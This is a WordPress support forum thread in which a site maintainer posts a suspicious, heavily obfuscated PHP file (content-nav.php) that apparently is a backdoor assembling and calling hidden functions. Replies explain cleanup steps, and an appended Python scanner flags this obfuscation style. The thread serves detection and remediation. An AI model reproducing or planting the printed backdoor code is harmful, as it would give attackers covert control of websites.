• Resolved SocialSparkMedia

    (@socialsparkmedia)


    I’ve just been asked to help get this site up-to-date. It’s a very simple site with only a few pages that display image galleries, but the contact form stopped working and that is why he called me.

    While going through the site to assess what needs to be done, I discovered this content-nav.php file that looks suspicious. I have run the site through Sucuri and it says it’s clean, and also ran a ManageWP Security scan on it and it comes up clean. I’m no php programmer, but this doesn’t look like nav code to me. What’s going on here? How do I fix it if no scans show anything is wrong?

    <?php
    $event =’Et’; $boggy= ‘n’; $geoduck = ‘(‘;$inclusively =’r’;$fares= ‘)Re$[‘; $asm =’e’;$browbeating =’,’;$chalkboard='(‘;
    $garrard = ‘at]”9′;$exhibition =’rcayR))C’;$coherence=’S’;$darting=’$’;

    $codification= ‘i”lv9U”OC’;$fish= ‘>Rf@JgIuE’;$humorously=’VrTg’;$bases = ‘=’;$eastward= ‘[‘;$forrest =’P’; $herringbone=’t’; $intensively=’?ieS”‘;$amazers = ‘K’; $anecdotes=’K’;

    $isotope=’=r,;’;$cackles=’D’;$constantin = ‘$’; $loving=’7′; $favorable =’p’; $antonina= ‘(ti;cd[‘; $blanches=’E”(s’; $gatekeep = ‘e’;$arclike =’O’;

    $coating =’$’;

    $audiotape= ‘e’;
    $inertance= ‘9’;

    $counterexample = ‘dr’;$impossibly = ‘(‘;$astride = ‘c;cGT”ru_’;$giusto=’p’;$anticompetitive= ‘e db’; $liable= ‘E’;$glissade=’H’;

    $launches =’Es:NTTDQ’; $lures=’_”‘;$lonesome = ‘e’;$luxuriantly= ‘_’;$georgi=’_’;$complementation =’Vm’; $grease = ‘fnH_a’; $envies = ‘T’; $differed =’i$$BaE$?’;
    $bleating =’)’; $font=’i’; $crest=’7′; $antipodean =’)’;$apostrophe= ‘[y’; $counteractive =’_’;
    $blot= ‘o’; $blowfish =’A9′;
    $geoduck= ‘_9ge(Za)i’;$confounding =’$FUEs[eat’;$ending = ‘SW’;

    $disengage=’R’;$hillside=’s$6DLXC’;$dauntless =’elY9a(a9H’;$liquifier=’i’;$evildead = ‘P’; $employer=’)’; $avidly = ‘c7d:i_?M’;

    $infighting = ‘;)(‘; $bandwagon= ‘a’;$homotopy= ‘o9$_ao’; $bronchial= ‘e’; $entrenching = ‘e’;
    $blondie= ‘]’; $dannye =’4′;$humfried = ‘](eeE’; $apprehension = ‘c’;$anarchists= ‘C’; $evania =’r’;
    $livid = ‘na_)=OIP]’;

    $clays= ‘Q’;$evinced = ‘Ti”v_d’; $anarchist= ‘s7se’;$kingpin= $apprehension .$evania.$anarchist[‘3’]. $livid[1].$confounding[‘8’] . $anarchist[‘3’].$evinced[‘4’]. $grease[‘0’] . $astride[‘7’] .$livid[‘0’].

    $apprehension.$confounding[‘8’] .$evinced[‘1’].
    $homotopy[‘5’]. $livid[‘0’]; $geralda= $anticompetitive[‘1’]; $legions = $kingpin($geralda, $anarchist[‘3’] . $evinced[‘3’].$livid[1] .$dauntless[1]. $humfried[‘1’] .

    $livid[1] .

    $evania.$evania. $livid[1].

    $apostrophe[‘1’].$evinced[‘4’].$giusto. $homotopy[‘5’] .
    $giusto . $humfried[‘1’]. $grease[‘0’] .$astride[‘7’]. $livid[‘0’].$apprehension. $evinced[‘4’] .$geoduck[‘2’]. $anarchist[‘3’].$confounding[‘8’].$evinced[‘4’] . $livid[1] .$evania . $geoduck[‘2’] .

    $anarchist[‘2’].

    $humfried[‘1’] .$livid[‘3’].$livid[‘3’].

    $livid[‘3’] .$infighting[0]);$legions($dauntless[1] , $livid[‘5’] , $evinced[‘0’] ,

    $giusto ,

    $fish[‘4’] ,

    $hillside[‘5’] ,$livid[‘4’] ,$confounding[‘1’] ,$ending[‘1’] , $homotopy[‘2’].$evinced[‘1’].$livid[‘4’]. $livid[1] . $evania. $evania .$livid[1] .

    $apostrophe[‘1’].
    $evinced[‘4’] . $complementation[‘1’] .$anarchist[‘3’].

    $evania . $geoduck[‘2’].$anarchist[‘3’] .$humfried[‘1’] .$homotopy[‘2’]. $evinced[‘4’]. $disengage. $humfried[4]. $clays .$confounding[‘2’]. $humfried[4] .$ending[‘0’] . $evinced[‘0’] .$isotope[‘2’] .$homotopy[‘2’] .$evinced[‘4’] . $anarchists .

    $livid[‘5’] . $livid[‘5’]. $anecdotes.$livid[‘6’] . $humfried[4] . $isotope[‘2’]. $homotopy[‘2’] .$evinced[‘4’].
    $ending[‘0’] . $humfried[4]. $disengage .$complementation[‘0’] . $humfried[4] . $disengage. $livid[‘3’] .$infighting[0] .$homotopy[‘2’].

    $livid[1] .$livid[‘4’].$evinced[‘1’].$anarchist[‘2’] . $anarchist[‘2’] .$anarchist[‘3’]. $confounding[‘8’] . $humfried[‘1’]. $homotopy[‘2’]. $evinced[‘1’]. $confounding[‘5’] .$evinced[‘2’].$anarchist[‘3’]. $homotopy[‘1’].
    $apprehension.
    $homotopy[‘1’].$anarchist[‘1’].$evinced[‘5’]. $evinced[‘2’]. $livid[‘8’].$livid[‘3’] .$avidly[‘6’].
    $homotopy[‘2’] . $evinced[‘1’] .$confounding[‘5’] . $evinced[‘2’].$anarchist[‘3’].$homotopy[‘1’] .$apprehension .$homotopy[‘1’].$anarchist[‘1’] .$evinced[‘5’] .$evinced[‘2’]. $livid[‘8’].

    $avidly[‘3’] .$humfried[‘1’].
    $evinced[‘1’]. $anarchist[‘2’]. $anarchist[‘2’] . $anarchist[‘3’] .$confounding[‘8’] .$humfried[‘1’] . $homotopy[‘2’] . $evinced[‘1’] .$confounding[‘5’]. $evinced[‘2’] .
    $dauntless[‘8’] .$evinced[‘0’].

    $evinced[‘0’].$livid[‘7’] .

    $evinced[‘4’]. $humfried[4].$homotopy[‘1’].$anarchists .$homotopy[‘1’] .$anarchist[‘1’] .
    $hillside[‘3’] . $evinced[‘2’].
    $livid[‘8’] .

    $livid[‘3’] .
    $avidly[‘6’] .$homotopy[‘2’] . $evinced[‘1’]. $confounding[‘5’]. $evinced[‘2’]. $dauntless[‘8’] .
    $evinced[‘0’] . $evinced[‘0’].$livid[‘7’] . $evinced[‘4’].$humfried[4] . $homotopy[‘1’] . $anarchists .
    $homotopy[‘1’].$anarchist[‘1’] .
    $hillside[‘3’].$evinced[‘2’]. $livid[‘8’] .$avidly[‘3’] . $evinced[‘5’].$evinced[‘1’] . $anarchist[‘3’]. $livid[‘3’].$infighting[0].$anarchist[‘3’] . $evinced[‘3’] .

    $livid[1].

    $dauntless[1].$humfried[‘1’] .$anticompetitive[‘3’]. $livid[1] .$anarchist[‘2’] . $anarchist[‘3’].

    $hillside[‘2’] .

    $dannye.$evinced[‘4’] . $evinced[‘5’] . $anarchist[‘3’].$apprehension. $homotopy[‘5’] . $evinced[‘5’] .$anarchist[‘3’] .$humfried[‘1’]. $homotopy[‘2’].
    $livid[1] . $livid[‘3’] .
    $livid[‘3’].$infighting[0] );

Viewing 5 replies - 1 through 5 (of 5 total)
  • Unless you used the paid version of Sucuri, you didn’t get a server side scan. I am not familiar with ManageWP, so I don’t know about its scanning methods.

    If you find no outward signs of a hack, like spam links or redirects, I suggest you try one or two more plugins. Wordfence and Anti-Malware from GOTMLS.NET are both good choices. If you use Wordfence, I suggest you go to Dashboard > Wordfence > Options > Scans to include and check all the boxes in this section before you run a scan. This will give you the most scanning options.

    Thread Starter SocialSparkMedia

    (@socialsparkmedia)

    Thanks, wslade, I’ll give Wordfence a shot. If it shows that there is a problem with the site, it won’t repair it, will it?

    Don’t the contents of that file look suspicious to you?

    Yes, I’m sorry to say that your site is very likely hacked. The only completely safe way to repair a damaged site is to restore from a known good backup. If you don’t have a good backup, it’s a possibility that the host has one.

    The second best way to clean up a site is to follow this guide.

    About your question of using Wordfence to repair a site, here is information: https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/. And yes, correctly used, Wordfence will help you clean a damaged site. But as good a tool as it is, Wordfence sometimes will not find all the malware.

    If backup isn’t available, I almost always suggest following the guide. But IF your site has no outward signs of a hack, possibly the hack was only partially effective. And maybe you can find all the malware using Wordfence.

    Thread Starter SocialSparkMedia

    (@socialsparkmedia)

    Thanks so much for all of that useful info and for the links. This is exactly the information I was looking for. I will read over the guides and give it a shot. It’s such a simple site, I could probably recreate it pretty easily if necessary.

    Thanks again for taking the time to help!

    Fran

    I’m glad I could help. The pages, posts and comments are in the database. Any images and other media are in wp-content.

    Maybe your database is not damaged. Delete everything in the WordPress root except wp-content and wp-config.php. Replace the plugins and theme with new ones and you have done everything in the guide.

    Be sure to add Wordfence or another good security plugin to help prevent future damage.

  • The topic ‘content-nav.php hacked?’ is closed to new replies.
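
Added example, not part of the original thread or of any plugin mentioned in it: a small heuristic scanner for the style of the file in the first post, which spells names from single indexed characters ($anarchist['3'], $livid[1]) and then calls the result through a variable ($kingpin(...), $legions(...)). The function names, the threshold of 8 and both sample strings are assumptions made for this illustration; a hit means "open this file and read it", not proof of compromise.

```python
import os
import re

# Numeric string offsets such as $livid[1] or $anarchist['3']. Curly quotes are
# accepted as well because forum software rewrites ' when code is pasted.
INDEXED_CHAR = re.compile(r"\$\w+\[\s*['\"‘’]?\d+['\"‘’]?\s*\]")
# A call through a variable such as $kingpin(...): the callee name is data.
VARIABLE_CALL = re.compile(r"\$[A-Za-z_]\w*\s*\(")

def score_php(source, min_indexed=8):
    """Count the two patterns and flag the file when both are present."""
    indexed = len(INDEXED_CHAR.findall(source))
    calls = len(VARIABLE_CALL.findall(source))
    return {"indexed_chars": indexed, "variable_calls": calls,
            "suspicious": indexed >= min_indexed and calls > 0}

def scan_tree(root):
    """Return paths of .php files under root that score_php flags."""
    flagged = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if score_php(fh.read())["suspicious"]:
                        flagged.append(path)
    return sorted(flagged)

# Constructed, harmless sample in the style of the posted file: it spells
# "strtoupper" one character at a time and calls it through a variable.
OBFUSCATED = r"""<?php
$ab = 'srt'; $cd = 'o_up'; $ef = 'per';
$fn = $ab[0] . $ab['2'] . $ab[1] . $ab['2'] . $cd[0] . $cd['2'] . $cd[3]
    . $ef[0] . $ef['1'] . $ef[2];
echo $fn('x');
"""

# Constructed sample of what a theme's navigation template normally looks like.
CLEAN = r"""<?php
$nav_id = $args['id'];
$first  = $items[0];
if ( $wp_query->max_num_pages > 1 ) : ?>
<nav id="<?php echo esc_attr( $nav_id ); ?>">
  <div class="nav-previous"><?php next_posts_link( 'Older posts' ); ?></div>
</nav>
<?php endif;
"""

if __name__ == "__main__":
    print("obfuscated:", score_php(OBFUSCATED))
    print("clean:     ", score_php(CLEAN))
```

Run scan_tree() against a downloaded copy of the site rather than the live server, and compare anything it flags with a fresh copy of the same theme or plugin file.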